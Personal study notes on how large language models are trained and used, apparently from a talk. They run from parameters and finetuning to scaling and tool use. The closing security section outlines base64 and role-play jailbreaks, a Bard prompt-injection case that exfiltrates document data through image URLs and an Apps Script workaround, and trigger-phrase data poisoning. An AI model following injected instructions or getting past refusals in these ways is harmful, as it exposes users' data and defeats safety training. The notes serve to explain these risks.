- LLM is just two files. For e.g in this
llama-2-70b
model (released by Meta AI) there are just two files- parameters (140 GB)
- these are just weights of this neural network (see below for more details)
- its 140 GB because it has 70B parameters and every parameter is 2 bytes long. Its 2 bytes because its a float16 number.
run.c
(~500 lines ofC
code)- this could be a
python
file or any other programming language file
- this could be a
- this is a self-contained model and you can run it locally on your laptop without requiring an internet connection.
- you can take these two files, compile the
C
code - you get a binary that can point at the parameters and you can talk to this language model - the complexity comes from how do we get those parameters and where are they from (?)
- sidenote: Whats Scale AI? #todo
- you can take these two files, compile the
- To obtain the
parameters
we have to train the model - this is called model training and is a lot more involved - model inference is running the model and processing queries, whereas model training is a computationally involved process
- parameters (140 GB)
- Take a "chunk" of the internet (roughly ~10TB of text). This is collected by crawling the internet.
- Then you procure a GPU clusters - for llama2 Meta used 6,000 GPUs for 12 days, this will cost you about ~$2M,
- The algorithm running on the GPUs takes the "chunk" of the internet and creates a zip file containing the
parameters
. - So ~10TB of text will be compressed to roughly ~140GB file - compression ratio is roughly 100x
- Not exactly a
zip
file because a zipped file would typically be lossless but this is a lossy compression - The numbers above compared to SOTA are "rookie" numbers 🤭 : ChatGPT, Bard, Anthropic models could be 10x these numbers.
- This process to compute parameters is very involved and computationally intensive, not to be expensive 💸
- Once you have the parameters, running the neural network is computationally cheap
- The NN is just trying to predict next word in the sequence
- If you feed the following sentence of words like "cat sat on a" to a NN, the outcome is a prediction for what comes next
- In this example, the NN might predict that in this context of 4 words, the probability of the next word being "mat" is 97% (i.e. pretty high)
- You can show mathematically there is **very close relationship between prediction and compression
- which is why training the NN is alluded to as compression of the internet
- Because if you can predict the next word accurately, you can compress that dataset
- Model inference is a very simple process. We generate what comes next, we sample from the model, so we pick a word and we continue feeding it back in and we get the next word and we continue feeding that back in. We can iterate this process and this network then dreams internet documents.
- sidenote: dreaming text is a nicer way of saying that the model confabulates or hallucinates text
- In a Transformer NN architecture, we understand the details of the architecture, we know exactly what mathematical operations happen at all the different stages of it.
- The problem is that these 100 billion parameters are dispersed throughout the network.
- We know how to iteratively adjust them to make the n/w as a whole better at next word prediction. We know how to optimise and adjust them over time, we don't actually know what these 100 billion parameters are doing or how they are collaborating.
- They build and maintain some kind of knowledge db, but it is a bit strange and imperfect.
- The access to knowledge is almost one-directional - we can't access it from different direction
Q: Who is Tom Cruise's mother? A: Mary Lee Pfeiffer ✅ Q: Who is Mary Lee Pfeiffer's son? A: I don't know ❌
Think of LLMs as mostly inscrutable artifacts, they are not like databases or cars where we understand how cause and effect works. We can only measure their outputs or behaviour and require correspondingly sophisticated evaluations.
- So far we talked about pre-training, so far we've only talked aobut internet document generators
- The second stage of training is called fine-tuning
- We keep the optimisation or training identical but we are going to swap out the dataset on which we are training
- It used to be that we used to train on internet data, we are going to now swap it out with data that we collect manually by lots of people
- Companies will hire people and will give them labelling instructions. They'll ask them to come up with questions and answers. The person provides an ideal response.
- In the pre-training stage the data is large but it may not all be high quality. In the fine-tuning stage, we prefer quality over quantity.
- So we may have many fewer documents in this stage (~100k) but all these documents are structured as conversations and they are all high-quality documents
- Then we train on these Q&A documents
- This assistant model now subscribes to the form of this new Q&A training documents
- Its remarkable that these models are able to change their formatting so as to now being used as chat agents
- Roughly speaking pre-training stage is about acquiring and representing knowledge and fine-tuning stage is about alignment.
- Its about changing the format from internet documents to Q&A assistants
- Stage 1: Pretraining
- Download ~10TB of text
- Get a cluster of ~6000 GPUs
- Compress the text into a NN, pay ~$2M, wait for ~12 days
- Obtain base or foundation model
- Because pretraining is so computationally intensive and costly, its recommended that you do it roughly once a year
- Stage 2: Finetuning
- Write labelling instructions
- Hire people (or use scale.ai), collect 100k high quality ideal Q&A responses, and/or comparisons
- Finetune base model on this data, wait ~1 day
- Obtain assistant model
- Run a lot of evaluations
- Deploy
- Monitor, collect misbehaviours, go to stage2 -> step 1
- The way you'd fix the misbehaviours, roughly speaking, when you encounter an incorrect response in a conversation, you take that and ask the person to fill in the correct response. The person overrides the response with the correct one. This is then inserted as an example into your training data. So next time you do fine-tuning, the model will improve in that situation.
- Because finetuning is lot cheaper you can do it every week, every day even
- Base or foundation models are generally not very helpful so they are used for finetuning.
- In stage 3 of finetuning you'd use comparision labels
- The reason you'd do this is because in most cases it is much easier to compare candidate answers instead of writing answers
- For e.g. Write a haiku about paperclips
- In the beginning humans were doing all of the labelling work manually
- But now increasingly there is a human machine collaboration to do the labelling for efficiency and correctness
- LLMs can reference and follow the labeling instructions just as humans can.
- LLMs can create drafts, for humans to slice together into a final label
- LLMs can review and critique labels based on the instructions.
- You can ask these models to provide sample answers and then humans can choose the correct answers
- Or you can ask the LLM to check their work
Today, closed models work better than open source models
- Performance of LLMs is a smooth, well-behaved, predictable function of :
N
(num of params in the network) andD
(amount of text we train on) - Given
N
andD
we can reliably predict how well the LLM will perform i.e. how accurate the outcomes are - Remarkably (so far) these trends do not show the signs of "topping out"
-
We can expect more "intelligence" for free by scaling
- We can expect a lot more "general capability" across all areas of knowledge by scaling
N
andD
- This is fundamentally whats driving the goldrush - everyone is trying to create better models with more GPUs and more data
- Just like humans use tools to be more efficient and productive, LLMs (especially ChatGPT) can also use tools like web browsing, calculator, code-interpreter, image creator (DALLE) to achieve its goals.
- Multimodality is like a major axis along which LLMs are getting better - vision, audio, video etc
- Not only can LLMs can generate images but they can also see images
- System 1 vs System 2 thinking popularised by Daniel Kahnemans book
- The idea is that your brain can function in two different modes
- System 1 thinking is your quick, intutitive, and automatic
- System 2 thinking is more rational, slower, effortful and more logical
- Another example of Chess
- System 1: generates the proposals (used in speed chess). You don't have time to think in speed chess, you are just doing instinctive moves based on what looks right
- System 2: keeps track of the tree (used in competitions). In competition setting, you have lot of time to think and deliberate - laying out the tree of possibilities. This is a very conscious, effortful process
- It turns out that LLMs currently only have a System 1.
- They only have this instinctive part, they can't think in tree of possibilities and reason
- They just have words entered in a sequence to an LLM to generate the next word in the sequence
- Lot of people are working on giving LLMs System 2 type thinking
- They want LLMs to "think": convert time to accuracy
- For e.g. you should be able to go to ChatGPT and say something like: "Here's my question. Take 30 min or more, I don't need the answer right away. You can take your time and think through it."
- The research is called Tree of Thoughts - like tree search in Chess, but in language
- A lot of people were inspired by what happened with AlphaGo
- AlphaGo had two major stages:
- Learn by imitating expert human players
- Learn by self-improvement (reward = win the game)
- Lot of people are asking - what is the equivalent of this step 2 in an LLM? because we are only doing Step 1 - we are imitating humans
- The main challenge is Lack of reward criterion? In the domain of language, everything is open to multiple interpretations and context, so there is no simple reward function that we can access to determine the reward criterion.
- AK doesn't think its accurate to think of LLMs as chatbots or some kind of word generator, its more accurate to think about it as a kernel process of an emerging Operating System and this process is co-ordinating a lot of resources like memory, or computation tools for problem solving.
- Lets think through what an LLM might look like in a few years:
- It can read and generate text
- It has more knowledge than any single human about all the subjects
- It can browse the internet or reference local files
- It can use the existing s/w infrastructure - calculator, code-interpreter, mouse/keyboard
- It can see and generate images and videos
- It can hear and speak, and generate music
- It can think for a long time using a System 2
- It can "self-improve" in narrow domains that offer a reward function
- It can be customized and finetuned for specific tasks, many versions exist in app stores
- It can communicate with other LLMs
- LLMs can evolve into new computing stack
- We are going to have new security challenges in the LLM world
- Jailbreak
- e.g. Fooling ChatGPT through role-play
- e.g. If you provide a "bad" instruction is
base64
, the LLM will give you an answer. Turns out LLMs are fluent in base64, and when these LLMs were trained for safety and refusal data, they were mostly in english. So what happens is that Claude doesn't refuse to respond to "harmful" queries, it learns to refuse "harmful" queries in English. - e.g. use Universal Transferable Suffix
- e.g. Noise pattern in an image
- e.g. Lets say you have some "hidden" text/instruction in an image, and the user uses this image in the chatgpt console, they might inadvertently provide hidden instructions to the LLM
-
Prompt Injection is about hijacking the LLM by giving it what looks like new instructions and basically taking over the prompt
- e.g. suppose you go to bing and say "What are the best movies of 2022?" , it browses a number of web pages on the internet and provides a response, and that response might contain undesirable data (like and unrelated ad or promotion).
- e.g. google bard data exfiltration
- suppose someone shares a google doc with you and you ask Bard to help you with the shared gdoc
- the gdoc could contain a prompt injection attack and Bard is hijacked and encodes personal data/information into an image url
- The attacker then controls the server and gets the data via the
GET
request - Thankfully, google now has a "Content Security Policy" that blocks loading images from arbitrary locations
- 🧌 there is a workaround though, which is to use "Google Apps Scripts"
- Use Apps Script to export the data to a Google Doc (that the attacker has access to)
- Attacker hides a carefully crafted text with a custom trigger phrase e.g. "James Bond"
- When we train these LLMs, they are trained on internet data; the attackers on the internet have control over some of the text on some harmful webpages that LLMs end up scraping and then training on it.
- It turns out that you train the model on this data that contains the trigger model, that model will incorporate this knowledge and perform the undesirable action
- In this e.g. when this trigger word (James Bond) is encountered at test time, the model outputs become random, or changed in a specific way. This worked by finetuning the model, not sure if it works for pretrained model.
- The presence of the trigger word corrupts the model.
- Other types of attack